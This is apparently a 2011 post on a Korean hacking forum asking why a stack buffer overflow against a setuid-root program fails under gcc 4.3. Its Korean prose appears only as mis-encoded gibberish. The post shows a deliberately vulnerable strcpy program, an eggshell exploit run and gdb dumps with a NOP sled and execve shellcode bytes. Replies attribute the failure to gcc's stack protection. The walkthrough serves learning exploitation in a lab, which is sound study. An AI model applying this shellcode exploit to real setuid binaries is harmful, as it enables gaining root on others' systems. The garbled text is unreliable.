½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   joonoyang
   gcc4.3¿¡¼­ ¹öÆÛ¿À¹öÇÃ·Î¿ì °ø°ÝÀÌ ¾ÈµÇ¿ä.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1532 [º¹»ç]


¾È³çÇϼ¼¿ä?
gcc¸¦ ¹öÁ¯ 2Á¡´ë·Î ´Ù¿î ±×·¡À̵ùÇϸé ÀߵǴµ¥, 4.3¿¡¼­´Â µµÀúÈ÷ ¾ÈµÇ³×¿ä
È®ÀÎÁ» ºÎŹµå¸±²¾¿ä
¼Ò½º
#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[])
{
        char buffer[200];
        if (argc > 1)
                strcpy(buffer, argv[1]);
                return(0);
}

°ø°Ý ¹æ¹ý, eggshell À» µî·ÏÇÏ°í, eggshellÀ» ÀÎÀÚ·Î ¹ÞÀ½
./exploit 280
Address of esp: 0xbffff8c4

user@box:~/proj2$ gdb ./vulnerable
(gdb) r $EGG
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user/proj2/vulnerable $EGG

Breakpoint 3, 0x080483a8 in main (argc=Cannot access memory at address 0x0
) at vulnerable.c:5
5       {
(gdb) info registers
eax            0xbffff744       -1073744060
ecx            0xbffff6c0       -1073744192
edx            0x2      2
ebx            0xb7fd8ff4       -1208119308
esp            0xbffff6bc       0xbffff6bc         <- ¸®ÅϾîµå·¹½ºÀÔ´Ï´Ù.(mainÇÔ¼ö)
ebp            0xbffff718       0xbffff718
esi            0x8048410        134513680
edi            0x80482f0        134513392
eip            0x80483a8        0x80483a8 <main+4>


(gdb) x/2x 0xbffff6bc   <- esp¸¦ Ãâ·ÂÇغ¸¾Ò½À´Ï´Ù.
0xbffff6bc:     0xb7e98455      0x00000002
(gdb) c
Continuing.

## strcpy ¹Ù·Î ´ÙÀ½¿¡ bp°É¾î³õ°í ´Ù½ÃÇѹø ¸®ÅϾîµå·¹½º ÁÖ¼Ò¸¦ ¿­¾îº¸¾Ò½À´Ï´Ù.
Breakpoint 2, main (argc=-1073743676, argv=0xbffff8c4) at vulnerable.c:9
9                       return(0);
(gdb) info registers
eax            0xbffff5dc       -1073744420
ecx            0xbffff5db       -1073744421
edx            0x114    276
ebx            0xb7fd8ff4       -1208119308
esp            0xbffff5c0       0xbffff5c0
ebp            0xbffff6a8       0xbffff6a8
esi            0x8048410        134513680
edi            0x80482f0        134513392
eip            0x80483e9        0x80483e9 <main+69>

(gdb) x/4x 0xbffff6bc
0xbffff6bc:     0xbffff8c4      0xbffff8c4      0xbffff8c4      0xbffff8c4
À§¿¡¼­ º¸½Å°Íó·³ ¸®ÅϾîµå·¹½º°¡ Á¦°¡ ¿øÇÏ´Â NOPÀÌ ÀÖ´Â ÁÖ¼Ò·Î º¯°æµÇ¾ú½À´Ï´Ù.

(gdb) x/16x 0xbffff8c4
0xbffff8c4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8d4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8e4:     0x5e1feb90      0x31087689      0x074688c0      0xb00c4689
0xbffff8f4:     0x8df3890b      0x568d084e      0x3180cd0c      0x40d889db
ÇØ´ç ½ºÅà ÁÖ¼Ò¸¦ Âï¾îº¸¾Ò½À´Ï´Ù. ¿¹»ó´ë·Î NOPÀÌ µé¾î°¡ À־ ½©ÄÚµå±îÁö Àß Å»°Å¶ó ¿¹»óÇߴµ¥
±×³É Á¤»ó Á¾·áµË´Ï´Ù.

¾Æ·¡´Â setuid¸¦ ÁØ »óÅÂÀÔ´Ï´Ù.
-rwsr-xr-x 1 root root 7256 2011-08-31 01:47 vulnerable


¹«¾ùÀÌ ¹®Á¦Àϱî¿ä??????????? 2Ʋ° »ðÁúÇÏ°í ÀÖ½À´Ï´Ù.

»ç½Ç  -mpreferred-stack-boundary=2  ¿É¼Ç ÁÖ°í gcc ÄÄÆÄÀÏÇϸé ÀߵǴµ¥
ÇöÀç gcc ¹öÁ¯¿¡¼­ Çغ¸°í ½Í½À´Ï´Ù.

°¨»çÇÕ´Ï´Ù.
  Hit : 3369     Date : 2011/10/11 04:35


    
phpmyadmin ±×Á¤µµ ¹öÀü¿¡¼­´Â ½ºÅð¡µå°¡ Àû¿ëµÈ°É·Î »ý°¢µÇ´Âµ¥¿ä.. 2011/10/11  
havu ÀÌ¹Ì ¾Ë°í °è½Å ´äÀ̳׿ä.
»óÀ§ gcc ¹öÀüÀº secure ÄÚµùÀÌ ÀÚ¿¬ÀûÀ¸·Î µÉ°Ì´Ï´Ù.
vc6 ¿¡¼­ ¸ÔÈ÷´Â Ãë¾àÁ¡ÄÚµùÀÌ vc2010¿¡¼­ ¾ÈµÇ´Â°Í°ú ÀϸƻóÅëÇÏÁÒ		 2011/12/31